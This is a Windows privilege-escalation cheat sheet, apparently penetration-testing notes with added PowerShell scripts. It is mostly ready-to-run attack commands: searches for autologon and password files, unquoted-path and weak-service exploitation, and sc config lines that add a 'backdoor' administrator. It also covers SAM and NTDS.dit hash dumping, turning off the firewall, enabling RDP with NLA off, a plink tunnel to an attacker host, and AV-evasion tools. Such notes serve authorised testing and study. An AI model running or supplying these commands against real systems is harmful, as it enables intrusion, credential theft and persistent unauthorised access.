Windows Privilege Escalation
2024-03-19 13:16:17

Host Info

ver
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
tasklist /v
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
wmic os get Caption, CSDVersion /value

User Info

whoami
echo %username%
net user
net user (username)
echo %userprofile%
net localgroup
net config Workstation | find "User name"
query user
wmic useraccount get name
wmic /node:"127.0.0.1" computersystem get username
qwinsta
cmdkey /list

Environment Info

set
net

Domain Info

net view /domain
net view /domain:<domain>
net localgroup "Administrators"
net group "Domain Admins" /domain
net share
net session | find "\\"

Network Info

ipconfig /all
route print
arp -a
netstat -ano

Autologon Credentials

If automatic logon is configured the plaintext password may sit in the registry:

reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword

Password Enumeration

cmdkey /list
Simple File Search:
dir /s *password*
findstr /s /n /i /p password *
findstr /si password *.txt
dir /s *secret*
findstr /s /n /i /p secret *
findstr /si secret *.txt

Scheduled Tasks

schtasks /query
schtasks /query /v /fo LIST
Get-ScheduledTask | Where State -EQ 'Ready'

Patch Levels (KB)

systeminfo 

wmic qfe get Caption,Description,HotFixID,InstalledOn

Notes
Look for privilege-escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799).
After enumerating the OS version and Service Pack, work out which privilege-escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing. Caveat: wmic qfe (and Get-HotFix) only lists updates installed through Windows Update/WUSA, and on Windows 10 and later a newer cumulative update supersedes older KBs, so a "missing" KB is a lead to confirm against the OS build number, not proof that the host is vulnerable.
Search the installed patches for given KB numbers:
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
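The same check in PowerShell, as an added example that is not part of the original notes: it compares the KB numbers listed above against Get-HotFix (which reads the same Win32_QuickFixEngineering data as wmic qfe) and prints the OS build first, because the build number decides which of these kernel exploits are even relevant. The KB to bulletin mapping in the hashtable is copied from the notes above; edit it for the target's OS generation.

```powershell
# Added example, not from the original notes: compare a list of EoP-relevant KBs
# against what Get-HotFix reports, and show the OS build alongside so a "missing" KB
# can be judged against later cumulative updates that supersede it.
$Interesting = @{
    'KB979682'  = 'KiTrap0D'
    'KB2393802' = 'MS11-011'
    'KB982799'  = 'MS10-059'
    'KB979683'  = 'MS10-021'
    'KB2592799' = 'MS11-080'
}

function Get-MissingHotfixes {
    param([Parameter(Mandatory)][hashtable]$Wanted)
    # Get-HotFix reads the same Win32_QuickFixEngineering class as "wmic qfe"
    $installed = @(Get-HotFix -ErrorAction SilentlyContinue | ForEach-Object { $_.HotFixID.ToUpper() })
    foreach ($kb in $Wanted.Keys | Sort-Object) {
        [pscustomobject]@{
            KB        = $kb
            Bulletin  = $Wanted[$kb]
            Installed = ($installed -contains $kb.ToUpper())
        }
    }
}

# OS identification first: the build number decides which exploits are relevant at all
Get-CimInstance Win32_OperatingSystem |
    Select-Object Caption, Version, BuildNumber, OSArchitecture, CSDVersion | Format-List

Get-MissingHotfixes -Wanted $Interesting | Format-Table -AutoSize
```

Installed = False for a KB on a modern build usually means the fix arrived inside a cumulative update under a different KB number, so treat the table as a to-do list for version checks rather than a list of working exploits.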

Writable Files

dir /a-r-d /s /b

Notes

/a filters on attributes. Here r is read-only and d is directory; the minus signs negate them, so only files without the read-only attribute are listed.

/s recurses subdirectories.
/b means bare format: path and filename only.

Caveat: the read-only attribute is not an ACL. A file without it can still be unwritable for your user, and a directory can be writable for you even if every file in it carries the attribute. Run icacls (or accesschk, see Weak Service Permissions below) on the candidates this turns up to confirm your actual write access.

Unquoted Service Paths

List all unquoted service paths (minus built-in Windows services) on our compromised machine. The last findstr drops paths that already contain a double quote (""" is how findstr matches a literal quote character):

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Suppose we found:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

If you look at the registry entry for this service with Regedit (HKLM\SYSTEM\CurrentControlSet\Services\<service>) you can see the ImagePath value is:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

To be secure it should be quoted:
"C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe"

Because the path is unquoted, CreateProcess treats every space as a possible end of the executable name and appends .exe wherever the candidate has no extension. When Windows starts the service it tries the following paths in order and runs the first one that exists:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

Check the permissions of each directory in the path. A standard user normally cannot write to C:\ or to Program Files itself, so the interesting case is usually a vendor folder with loose ACLs:
icacls "C:\Program Files (x86)\Program Folder"

If we can write to one of those directories we plant our payload under the matching name (here A.exe inside Program Folder) and restart the service. Restarting requires SERVICE_STOP/SERVICE_START on the service, which ordinary users rarely have; for an Auto-start service a reboot (or waiting for one) does the job. The Service Control Manager kills a process that does not report as a service within about 30 seconds, so the payload should spawn its real work and return, or be a proper service executable.

Metasploit module:

exploit/windows/local/trusted_service_path
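An added PowerShell example (not from the original notes) that does the whole procedure above in one pass: it pulls Auto-start services with an unquoted, space-containing binary path, generates exactly the candidate paths CreateProcess will probe, and tests each candidate's directory for write access by actually creating and deleting a random empty file there. That probe is also the real answer to the Writable Files caveat above: the read-only attribute tells you nothing about ACLs, an attempted write does. Assumptions: PowerShell 5.1 or later, and that leaving a transient zero-byte file in each probed directory (it shows up in the USN journal) is acceptable for the engagement. The built-in service filter mirrors the wmic filter above but uses $env:SystemRoot rather than a hard-coded C:\Windows.

```powershell
# Added example, not part of the original notes: enumerate unquoted service paths,
# list the intermediate paths Windows will probe (CreateProcess splits on every
# space and appends .exe where no extension is present) and test whether we can
# actually write to each candidate's directory.

function Get-CreateProcessCandidates {
    # Returns the paths CreateProcess tries before the full path, in probe order.
    param([Parameter(Mandatory)][string]$UnquotedPath)
    $tokens = $UnquotedPath -split ' '
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        $prefix = $tokens[0..($i - 1)] -join ' '
        # .exe is only appended when the candidate has no extension at all
        if ([IO.Path]::GetExtension($prefix) -eq '') { $prefix += '.exe' }
        $prefix
    }
}

function Test-DirectoryWritable {
    # Probe by writing: ACL parsing misses deny ACEs, group nesting and inheritance edge cases.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([IO.Path]::GetRandomFileName())
    try     { [IO.File]::WriteAllText($probe, ''); return $true }   # touches disk: note for OPSEC
    catch   { return $false }
    finally { Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue }
}

Get-CimInstance Win32_Service |
    Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -and $_.PathName -notmatch '^"' } |
    ForEach-Object {
        $svc = $_
        # Strip service arguments: keep everything up to and including the first ".exe"
        if ($svc.PathName -match '^(?<exe>.+?\.exe)') { $exe = $Matches['exe'] } else { return }
        # Skip paths without spaces (not exploitable this way) and built-in Windows services
        if ($exe -notmatch ' ' -or $exe -like "$env:SystemRoot\*") { return }
        foreach ($candidate in Get-CreateProcessCandidates $exe) {
            [pscustomobject]@{
                Service   = $svc.Name
                ImagePath = $svc.PathName
                Candidate = $candidate
                Writable  = Test-DirectoryWritable (Split-Path -Parent $candidate)
            }
        }
    } | Format-Table -AutoSize
```

For the example path above the Candidate column lists C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Program.exe and C:\Program Files (x86)\Program Folder\A.exe; any row with Writable = True is a spot where your payload, saved under that exact candidate name, runs as the service account on the next service start.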

Weak Service Permissions

accesschk (Sysinternals):
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

# Services that Authenticated Users can write to (change configuration etc.)
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Directories under C:\Windows writable by Authenticated Users / Users
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\

Then query the service using Windows sc, and note the original BINARY_PATH_NAME, START_TYPE and SERVICE_START_NAME so you can restore them afterwards:
sc qc <vulnerable service name>

Then change the binpath to execute your own commands. A restart of the service is needed; the command runs as the service account (usually LocalSystem), and sc start will report a timeout because net.exe never reports back to the Service Control Manager, which is expected and does not stop the command from running:

sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
sc stop <vuln-service>
sc start <vuln-service>

Note: you might need to set the depend, start and obj attributes explicitly (the space after each = is required by sc):
sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>

Metasploit module:
exploit/windows/local/service_permissions
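When accesschk cannot be dropped on the box, the same question can be answered with built-ins. The following is an added PowerShell example, not part of the original notes and not how accesschk works internally: it reads each service's security descriptor with sc.exe sdshow, parses the SDDL with .NET's RawSecurityDescriptor, and reports allow ACEs that give one of the SIDs in our own token a right that leads to code execution. The access-mask constants are the documented service-specific and standard rights (SERVICE_CHANGE_CONFIG is what the sc config trick above relies on; WRITE_DAC and WRITE_OWNER let you grant yourself anything). Assumptions: PowerShell 5.1 or later and a default, non-strict error preference so sdshow failures on services you cannot read are skipped silently.

```powershell
# Added example, not part of the original notes: find services whose DACL grants
# our own token a right we can turn into code execution as the service account.
$SERVICE_CHANGE_CONFIG = 0x00000002   # rewrite binPath= / obj= (the sc config trick)
$WRITE_DAC             = 0x00040000   # rewrite the DACL itself, then grant anything
$WRITE_OWNER           = 0x00080000   # take ownership, then WRITE_DAC follows
$GENERIC_WRITE         = 0x40000000   # maps onto SERVICE_CHANGE_CONFIG and more
$GENERIC_ALL           = 0x10000000
$Dangerous = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_WRITE -bor $GENERIC_ALL

function Get-WeakServiceAces {
    $me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # Every SID our token carries: user, Authenticated Users, Users, custom groups...
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

    foreach ($svc in Get-Service) {
        # sdshow prints the SDDL on a single line starting with "D:"; skip services we cannot read
        $sddl = (sc.exe sdshow $svc.Name 2>$null | Where-Object { $_ -match 'D:\(' }) -as [string]
        if (-not $sddl) { continue }
        $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($sddl.Trim())

        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceQualifier -ne 'AccessAllowed') { continue }          # deny ACEs are not a win
            if (($ace.AccessMask -band $Dangerous) -eq 0) { continue }        # nothing useful granted
            if ($mySids -notcontains $ace.SecurityIdentifier.Value) { continue }  # granted to someone else

            try   { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $who = $ace.SecurityIdentifier.Value }                    # unresolvable SID: keep raw

            [pscustomobject]@{
                Service   = $svc.Name
                Principal = $who
                Mask      = ('0x{0:X8}' -f $ace.AccessMask)
                Rights    = @(
                    if ($ace.AccessMask -band $SERVICE_CHANGE_CONFIG) { 'CHANGE_CONFIG' }
                    if ($ace.AccessMask -band $WRITE_DAC)             { 'WRITE_DAC' }
                    if ($ace.AccessMask -band $WRITE_OWNER)           { 'WRITE_OWNER' }
                    if ($ace.AccessMask -band $GENERIC_WRITE)         { 'GENERIC_WRITE' }
                    if ($ace.AccessMask -band $GENERIC_ALL)           { 'GENERIC_ALL' }
                ) -join ','
            }
        }
    }
}

Get-WeakServiceAces | Format-Table -AutoSize
```

A default service DACL looks like D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU) and produces no rows for a normal user; a row with CHANGE_CONFIG means the sc config sequence above will work on that service, and sc qc on it tells you which account (SERVICE_START_NAME) your command will run as.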

SAM Dumping

# Needs administrative rights; the System hive holds the boot key needed to decrypt the SAM hashes
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System

# Transfer SAM and System to the attacker, then (system hive first, then SAM):

samdump2 System SAM

NTDS Dumping

  • needs privileges: SeBackupPrivilege (Backup Operators membership is enough); robocopy /b is what uses it to read ntds.dit regardless of its ACL
    # save this in script.txt
    # the trailing X on every line is deliberate: diskshadow drops the last character of each line when it reads a script file
    set metadata C:\Windows\Temp\meta.cabX
    set context clientaccessibleX
    set context persistentX
    begin backupX
    add volume C: alias cdriveX
    createX
    expose %cdrive% E:X
    end backupX

    # run diskshadow
    diskshadow /s script.txt

    # copy ntds.dit from the exposed shadow copy to the current directory (/b = backup mode)
    robocopy /b E:\Windows\ntds . ntds.dit

    # you also need the SYSTEM hive (reg save HKLM\System, as in SAM Dumping above) to decrypt the hashes offline; impacket's secretsdump can do this from the two files

Post Exploitation

  • Add Users

    net user username password /add
    net localgroup Administrators username /add
    net localgroup "Remote Desktop Users" username /add
  • psexec (run a command on another host with credentials we hold)
    psexec.exe -accepteula \\10.11.10.167 -u hostname\username -p password cmd /c ipconfig

  • RunAs

    runas /user:hostname\<username> explorer.exe
  • Disable Firewall
    Remember, the default Windows Firewall policy is block all inbound and allow all outbound, so only inbound listeners (bind shells, RDP, SMB) need a change. Turning off every profile is noisy and logged; when that matters, add a single inbound allow rule for the port you need instead. The netsh firewall context is deprecated but still works on old hosts; advfirewall is the current one.

    netsh firewall show state
    netsh firewall show config
    netsh advfirewall firewall show rule name=all
    netsh advfirewall set allprofiles state off
  • RDP

    # Enable RDP (this does not open TCP 3389 in the firewall; enable the Remote Desktop rule group or see Disable Firewall above)
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    # Disable Network Level Authentication so old RDP clients (or tools without CredSSP) can connect without pre-authentication
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

    # Remote port forward with Plink: exposes this host's port 445 as port 9595 on the attacker (10.11.0.70); same pattern tunnels out RDP (3389) etc.
    plink.exe -l <user> -pw <password> 10.11.0.70 -R 9595:localhost:445
  • AV Evasion

    veil-evasion
    hyperion.exe

Extra

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
